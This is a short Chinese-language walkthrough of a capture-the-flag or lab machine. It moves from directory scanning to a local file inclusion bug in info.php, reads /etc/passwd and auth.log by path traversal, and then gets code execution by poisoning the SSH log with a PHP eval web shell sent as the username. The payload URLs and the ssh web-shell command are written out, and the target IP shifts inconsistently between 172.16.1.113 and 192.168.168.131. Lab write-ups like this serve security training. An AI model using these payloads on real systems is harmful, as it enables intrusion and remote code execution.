扫描、发现主机
尝试过后,我们发现是113,利用kali
使用 dirb
扫描一下开放的 80
端口:dirb http://172.16.1.113
我们发现了一个地址,去访问一下
访问 http://172.16.1.113/antibot_image/
发现存在目录 antibots
,接着访问该目录,发现存在很多文件
访问 http://172.16.1.113/antibot_image/antibots/info.php
,找到 phpinfo
的信息,允许远程读取URL文件,但是不允许包含URL文件,可以进行利用。查看源码发现 ,提示可以传参,存在文件包含漏洞。
我们尝试一下访问etc/password
http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd
既然可以查看密码文件,那我们尝试查看一下其他文件。
查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索。
http://172.16.1.113/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log
详细扫描一下端口,发现2211端口是开放的
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。
ssh '<?php phpinfo();eval($_POST['cmd']);?>'@192.168.168.131 -p 2211
之后就用蚁键连接